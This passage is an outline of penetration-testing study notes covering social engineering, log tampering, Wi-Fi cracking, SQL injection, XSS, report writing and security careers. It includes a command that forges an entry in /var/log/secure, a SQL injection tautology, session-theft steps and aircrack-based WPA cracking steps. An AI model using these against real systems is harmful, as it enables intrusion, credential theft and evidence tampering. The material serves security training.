    7. Internet Control Message Protocol (ICMP) redirection
    8. MITM
3. Social Engineering
  1. attacks
    1. Shoulder surfing
    2. Physical access to workstations
    3. Masquerading as a user
    4. Masquerading as a monitoring staff
    5. Dumpster diving
    6. Handling (finding) sensitive information
    7. Handling (finding) sensitive information
    8. Reverse social engineering
  2. Baiting
    1. uses computer media to entice a victim into installing malware
    2. Ex: leave a CD-ROM disk in a public place
    3. Rely on natural human curiosity when presented with an unknown
  3. Phishing
    1. fake e-mails, which request a user to connect to an illegitimate site
    2. Some phishing attacks target victims through the phone
  4. Pretexting
    1. inventing a scenario to convince victims to divulge information they should not divulge
4. Manipulating Log Data
  1. User Login
    1. Modifying the log file and matching time stamps.
      1. root@slax:~# more /var/log/secure
      2. root@slax:~# date
      3. Wed Apr 29 11:26:30 GMT 2009
      4. root@slax:~# echo ‘Apr 29 11:28:08 (none) su[31337]: + vc/1 root-root’ >> /var/log/secure
      5. root@slax:~# date
      6. Wed Apr 29 11:28:08 GMT 2009
  2. Application Logs
    1. Take a look at the /var/log/messages file
5. Hiding Files
  1. Hiding Files in Plain Sight
    1. we need to camouflage our script
    2. change the name of the file
  2. Hiding Files Using the File System
  3. Hiding Files in Windows
    1. By adding the hidden attribute to virus.exe
    2. any application launched in Microsoft Windows can be detected by looking at the processes running on the system
  4. Two options
    1. Delete the entire log
    2. Modify the content
  5. Two types of logs
    1. System generated
    2. Application generated
Targeting Support Systes
1. Database Attacks
  1. first step : Nmap scan, using the “-A” flag
  2. take a look at the available exploits and modules available on Metasploit
  3. First thing to check: weak passwords
  4. We can use our own dictionaries to conduct a brute-force attack
2. Network Shares
Targeting The Network
1. Wireless Network Protocols
  1. Wi-Fi Protected Access Attack
    1. Set in monitor mode
    2. airodump-ng
      1. Basic Service Set Identifier (BSSID)
      2. Extended Service Set Identifier
      3. Station (client) MAC addresses:
    3. aireplay-ng
      1. deauthenticate connected clients from a target access point, requiring the clients to reconnect and reauthenticate using the WPA handshake
    4. Dictionary attack against the encrypted key
    5. aircrack-ng
      1. Decipher our captured WPA encrypted key
  2. WEP Attack
    1. Crackin' WEP involves capturing all IVs between the client and the AP
      1. IVs are blocks of bits that are used to differentiate users on the wireless network
      2. IVs eliminate the need for users to constantly reauthenticate
    2. Eventually, an authenticated user will reuse an IV because the number of bits used is limited
    3. If enough IVs are captured, it is possible to decipher
    4. WEP encryption can be broken regardless of the encryption key complexity
2. Simple Network Management Protocol
  1. UDP scan
  2. Brute-force attack of SNMP community strings.
  3. “snmpenum.pl” script to dump data from the target system
  4. Modifying hostname using “snmpset.”
Web Apps Attack Techniques
1. SQL Injection
  1. technique used for manipulating Web services that send SQL queries to a RDBMS to alter, insert, or delete data in a database
  2. SQL injections work more often than they should
  3. SELECT * FROM user_data WHERE last_name = ‘Tom’ OR ‘1’ = ‘1’
    1. display the user_data associated with the user TOM
    2. give us everything because 1 = 1
  4. SQL injections are perfect examples of weaknesses in Integrity Controls
2. Cross-Site Scripting
  1. Gather session information of a victim user, Ex: administrator
  2. t is sometimes possible to conduct a replay attack—using the session information
  3. Injecting “Alert” script into database
  4. Once saved, an alert window will appear with the session ID information
  5. After we have successfully injected our script we wait until someone else visits Tom’s information
  6. use JavaScript or another programming language that imbeds into HTML to send the session ID
3. Web Application Vulnerabilities
  1. How
    1. Identify applications running on ports,usually port 80 or 443 for Web app
    2. Find version information (if possible)
    3. Look for exploits on the Internet.
    4. Run the exploits against the target application
  2. Top 10 attack vectors
    1. Injection (including SQL injections)
    2. Broken Authentication and Session Management
    3. Insecure Direct Object References
    4. Security Misconfiguration
    5. Sensitive Data Exposure
    6. Missing Function Level Access Control
    7. Cross-Site Request Forgery (an attack that targets a victim’s browser)
    8. Using Known Vulnerable Components
    9. Unvalidated Redirects and Forwards
4. Automated Tools
  1. CORE IMPACT
  2. HP WebInspect
  3. Nikto
  4. Paros Proxy
  5. Burp Suite Pro
    1. A proxy server
    2. A spider tool
    3. A vulnerability scanner
    4. A repeater tool
    5. A sequencing tool
Reporting Results
1. What Should You Report?
  1. Out of Scope Issues
    1. Findings that are discovered during the course of the pentest on a target
    2. Findings that indicate systemic flaws in the overall architecture
  2. Findings
    1. We need to include what was not found as well
    2. There will be times when a finding needs to be reported on immediately.
  3. Solutions
    1. Believe it or not, clients like to be told what to do.
  4. Manuscript Preparation
    1. Title Page
      1. Introduce the topic of the report
      2. Introduce author and the penetration test team’s organization
      3. Great place to brandish logos and make everything look appealing
      4. Primary goal: Provide a clear message of what the report is about
    2. Abstract
      1. The abstract = The executive report
      2. The executive summary should be no longer than one page and contain concise analysis and findings
    3. Text
      1. elements
      2. Description of the target network or system
      3. Vulnerability findings
      4. Remediation
      5. we should include graphical representation of the architecture and include descriptions of each element
      6. Vulnerability findings and remediation options should be meshed together
    4. References
      1. we should provide the reader Internet references regarding the vulnerabilities
      2. The National Vulnerability Database, located at http://nvd.nist.gov, is a good choice
    5. Appendices
      1. At least two appendices
      2. a list of definitions
      3. The step-by-step events surrounding each vulnerability exploitation
2. Initial Report
  1. Peer Reviews
    1. We all make mistakes, especially when writing.
  2. Fact Checking
    1. e can generate a list of questions that we need to answer or we can send a copy of the initial report to the client so that they can verify all statements within the document
  3. Metrics
    1. Nessus
    2. CORE IMPACT
3. Final Report
  1. Peer Reviews
    1. it is often prudent to conduct additional peer reviews on the report
    2. This is our last chance to correct any grammatical errors
  2. Documentation
    1. Most customers are comfortable with receiving printed reports
    2. Microsoft Word documents, or Adobe’s Portable Document Format (PDF)
    3. If we already have a digital certificate, we can use it to sign our document
    4. Selecting file for inclusion into security envelope.
Hacking as a career
1. Career Paths
  1. Network Architecture
    1. make sure that you understand as many different facets of network architecture as you can if you want to become a pentest engineer
    2. Learn about
      1. Communication protocols
      2. VoIP
      3. routers
      4. switches
      5. IDS
      6. firewall
      7. wireless
      8. ransmission Control Protocol (TCP)
      9. and anything else you can think of
  2. System Administration
  3. Applications and Databases
2. Certifications
  1. High-Level Certifications
    1. (ISC)2
      1. www.isc2.org
      2. About (ISC)2
      3. Headquartered in the United States
      4. offices in
      5. London
      6. Hong Kong
      7. Tokyo
      8. compendium
      9. Associate of (ISC)2
      10. This designation was created for individuals who do not meet the experience requirements to obtain any of the other certifications with (ISC)2
      11. employer that the associates have the knowledge to obtain the certifications, even if they don’t have the experience
      12. SSCP [(ISC)2]
      13. Access Controls
      14. Analysis and Monitoring
      15. Cryptography SSCP
      16. Malicious Code
      17. Networks and Telecommunications
      18. Risk, Response, and Recovery
      19. Security Operations and Administration
      20. Certification and Accreditation Professional (CAP)
      21. Understanding the Purpose of Certification
      22. Initiation of the System Authorization Process
      23. Certification Phase
      24. Accreditation Phase
      25. Continuous Monitoring Phase
      26. Certified Secure Software Lifecycle Professional (CSSLP) [(ISC)2]
      27. Secure Software Concepts
      28. Secure Software Requirements
      29. Secure Software Design
      30. Secure Software Implementation/Coding
      31. Secure Software Testing
      32. Software Acceptance
      33. Software Deployment, Operations, Maintenance, and Disposal
      34. CISSP [(ISC)2]
      35. Access Control
      36. Application Security
      37. Business Continuity Planning (BCP) and Disaster Recovery Planning (DRP)
      38. Cryptography
      39. Information Security and Risk Management
      40. Legal, Regulations, Compliance, and Investigations
      41. Operations Security
      42. Physical (Environmental) Security
      43. Security Architecture and Design
      44. Telecommunications and Network Security
      45. CISSP-ISSAP [(ISC)2]
      46. Access Control Systems and Methodology
      47. Cryptography
      48. Physical Security Integration
      49. Requirements Analysis and Security Standards, Guidelines and Criteria
      50. Technology-Related BCP and DRP
      51. Telecommunications and Network Security
      52. CISSP-ISSEP [(ISC)2]
      53. C&A
      54. Systems Security Engineering
      55. Technical Management
      56. U.S. Government Information Assurance Regulations
      57. CISSP-ISSMP [(ISC)2]
      58. BCP and DRP and Continuity of Operations Planning
      59. Enterprise Security Management Practices
      60. Enterprise-wide System Development Security
      61. Law, Investigations, Forensics, and Ethics
      62. Overseeing Compliance of Operations Security
      63. Information Systems Audit and Control Association
      64. Certified Information Systems Auditor
      65. Certified Information Security Manager
    2. Global Information Assurance Certification
      1. GIAC Security Leadership Certification
      2. GIAC Security Expert
    3. CompTIA
      1. Security +
      2. Network security
      3. Compliance and operational security
      4. Threats and vulnerabilities
      5. Application, data, and host security
      6. Access control and identity management
      7. Cryptography
    4. Project Management Institute
      1. Project Management Professional (PMP)
      2. Initiation
      3. Planning
      4. Executing
      5. Monitoring and Controlling
      6. Closing
    5. Dynamic Systems Development Method Consortium
  2. Skill- and Vendor-Specific Certifications
    1. Cisco
      1. Cisco Certified Network Associate Security
      2. Cisco Certified Network Professional Security
      3. Cisco Certified Internetwork Expert
    2. Global Information Assurance Certification
      1. GIAC Information Security Fundamentals
      2. GIAC Security Essentials Certification
      3. GIAC Web Application Penetration Tester (GWAPT)
      4. GIAC Certified Enterprise Defender (GCED)
      5. GIAC Certified Firewall Analyst (GCFW)
      6. GIAC Certified Intrusion Analyst (GCIA)
      7. GIAC Certified Incident Handler (GCIH)
      8. GIAC Certified Windows Security Administrator (GCWN)
      9. GIAC Certified UNIX Security Administrator (GCUX)
      10. GIAC Certified Forensics Analyst (GCFA)
      11. GIAC Certified Penetration Tester (GPEN
    3. Check Point
      1. Check Point Certified Security Administrator
      2. Check Point Certified Security Expert
      3. Check Point Certified Managed Security Expert
      4. Check Point Certified Master Architect (CCMA)
    4. Juniper Networks
      1. JNCIA-Junos (Juniper Networks)
      2. Juniper systems certifications JNCIS-SEC
      3. JNCIE-SEC
    5. Oracle
3. Associations and Organizations
  1. Professional Organizations
    1. merican Society for Industrial Security
    2. Institute of Electrical and Electronics Engineers
    3. ISACA—ISACA
    4. Information Systems Security Association
    5. The Open Organisation of Lockpickers
  2. Conferences
    1. DoD Cyber Crime Conference
    2. Network and Distributed System Security
    3. ShmooCon
    4. GOVSEC and U.S. Law Conference
    5. Theory of Cryptography Conference (TCC)
    6. IEEE Symposium on Security and Privacy
    7. The International Conference on Dependable Systems and Networks (DSN)
    8. REcon (Reverse Engineering Convention)
    9. Black Hat
    10. Computer Security Foundations Symposium
    11. Hackers on Planet Earth (HOPE)
    12. DefCon
    13. International Cryptology Conference
    14. USENIX Security Symposium
    15. European Symposium on Research in Computer Security
    16. International Symposium on Recent Advances in Intrusion Detection
    17. ToorCon
    18. Internet Measurement Conference (IMC)
    19. Microsoft BlueHat Security Briefings
    20. Association for Computing Machinery (ACM) Conference on Computer and Communications Security
    21. Annual Computer Security Applications Conference
    22. Chaos Communication Congress
  3. Local Communities
  4. Mailing Lists
    1. www.Securityfocus.com/archive
    2. Bugtraq—Bugtraq
    3. Focus-IDS
    4. INCIDENTS
    5. Security Basics
    6. SecurityJobs
4. Putting It All Together
  1. Resume
    1. Volunteering
      1. Charities
      2. www.HackersForCharity.org
      3. craigslist.org,
      4. Open Source Projects
    2. Internships
      1. www.dhs.gov/student-opportunities
      2. (www.fbi.gov/about-us/otd/internships
      3. www.cia.gov/careers/student-opportunities/index.html
      4. www.makingthedifference.org/federalinternships/directory
  2. Job Listings
  3. Salary Surveys
    1. Job Position Surveys
      1. www.Salary.com.
      2. http://www.cisco.com/web/learning/employer_resources/pdfs/2012_salary_rpt.pdf
    2. Certification Surveys
  4. Personal Documents